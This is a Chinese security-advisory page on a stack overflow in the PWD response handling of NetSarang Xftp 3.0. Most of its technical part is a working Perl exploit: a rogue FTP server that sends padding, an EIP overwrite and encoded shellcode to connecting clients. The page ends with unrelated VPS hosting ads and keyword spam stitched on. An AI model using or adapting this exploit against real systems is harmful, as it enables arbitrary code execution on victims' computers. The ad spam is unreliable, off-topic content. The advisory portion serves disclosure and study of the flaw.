厂商NetSarang Xftp 3.0 PWD响应栈溢出漏洞
影响版本:
NetSarang Xftp 3.0漏洞描述:
Xftp是Windows平台上使用的SFTP、 FTP文件传输程序。
如果Xf tp客户端受骗连接到了恶意的FTP服务器或打开了特制的.xfp会话文件并发送了超长命令的话,则在处理服务器返回的PWD响应时就可能触发栈溢出,导致执行任意代码。 <*参考http://secunia. com/advisories/39554/
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# Exploit Title:Xftp client 3.0 PWD Remote Exploit
# Date: 2010-04-21
# Author: zombiefx
# Software Link: http://www.netsarang.com/download/down_xft3.html
# Version: Xftp 3.0 build 0238
# Tested on: Windows XP SP3
# Usage: ./xftp_exploit
# The BOF occurs when sending an overly long PWD response.
# Code:
#!/usr/bin/perl use warnings;use strict;use IO: :Socket;
my $sock = IO: :Socket: :INET->new( LocalPort => '21' , Proto => ' tcp' , Listen => ' 1' )or die "Socket Not Created $!\n";print "#############################################################\n"
. "#Xftp client 3.0 PWD Exploit #\n"
. "#Listening on port 21 #\n"
. "#By:zombiefx Email: darkernet[at]gmail. com #\n"
. "#Major Greetz to corelanc0d3r/Dino Dai Zovi #\n"
. "#############################################################\n";my $junk = "\x41" x 1019;my $eip = pack( 'V' , 0x100123AF ) x 4; #Universal . . i think my $nops = "\x90" x 55;my $calcshell =
"\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49"
. "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
. "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
. "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
. "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
. "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47"
. "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c"
. "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a"
. "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
. "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43"
. "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a"
. "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c"
. "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44"
. "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c"
. "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47"
. "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50"
. "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44"
. "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43"
. "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42"
. "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b"
. "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45"
. "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";my $payload = $junk . $eip . $nops . $calcshell ;while ( my $data = $sock->accept() ) {print "Client Connected!\nAwaiting Ftp commands: \n";print $data "220 Microsoft FTP Service\r\n";while (<$data>) {print;print $data"331 Anonymous access allowed. \r\n" if (/USER/i) ;print $data "230-Welcome to FTP.MICROSOFT.COM.\r\n230 User logged in. \r\n" if (/PASS/i) ;print $data"257 \"/$payload\" is current directory. \r\n" if (/P WD/i) ;
}print "Payload delivered check the client!\n";
}
安全建议:
厂商补丁:
NetSarang
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
- 厂商NetSarang Xftp 3.0 PWD响应栈溢出漏洞相关文档
- 第5卷第1期信息安全学报Vol.
- Chinanetsarang
- 马克思杰马克丁与NetSarang携手,助力跨平台连接方案!
- netsarangMobaXterm怎么用
- netsarangxmanager怎么用
- netsarangXshell用户密钥要如何设置
VirMach:$27.3/月-E3-1240v1/16GB/1TB/10TB/洛杉矶等多机房
上次部落分享过VirMach提供的End of Life Plans系列的VPS主机,最近他们又发布了DEDICATED MIGRATION SPECIALS产品,并提供6.5-7.5折优惠码,优惠后最低每月27.3美元起。同样的这些机器现在订购,将在2021年9月30日至2022年4月30日之间迁移,目前这些等待迁移机器可以在洛杉矶、达拉斯、亚特兰大、纽约、芝加哥等5个地区机房开设,未来迁移的时...
HostKvm($4.25/月),俄罗斯CN2带宽大升级,俄罗斯/香港高防限量5折优惠进行中
HostKvm是一家成立于2013年的国外VPS服务商,产品基于KVM架构,数据中心包括日本、新加坡、韩国、美国、俄罗斯、中国香港等多个地区机房,均为国内直连或优化线路,延迟较低,适合建站或者远程办公等。本月,商家旗下俄罗斯、新加坡、美国、香港等节点带宽进行了大幅度升级,俄罗斯机房国内电信/联通直连,CN2线路,150Mbps(原来30Mbps)带宽起,目前俄罗斯和香港高防节点5折骨折码继续优惠中...
1核1G仅38元/月起野草云服务器,香港/美国洛杉矶CN2+BGP云服务器,
野草云服务器怎么样?野草云是一家成立了9年的国人主机商家,隶属于香港 LucidaCloud Limited (HongKong Registration No. 2736053 / 香港網上查冊中心)。目前,野草云主要销售香港、美国的VPS、虚拟主机及独立服务器等产品,本站也给大家分享过多次他家的优惠了,目前商家开启了优惠活动,香港/美国洛杉矶CN2+BGP云服务器,1核1G仅38元/月起!点击...
-
免费com域名注册哪个网站注册COM域名不要钱?域名代理域名代理能转到钱吗,如何赚钱啊?能够成为国外的域名代理商吗?网络服务器租用租网络服务器在哪些平台比较合适?域名主机域名与主机的对应关系在哪里可以看到?个人虚拟主机个人商城要选多大的虚拟主机?网站空间域名网站空间,域名,操作虚拟主机软件虚拟主机管理软件那个最好用?1g虚拟主机网站空间1G是多少M,网站空间用1G虚拟主机够吗。价格多少,数据库和网站有什么关系北京虚拟主机北京的虚拟主机提供商哪个经济实惠?长沙虚拟主机长沙哪里虚拟主机和主机托管比较关好!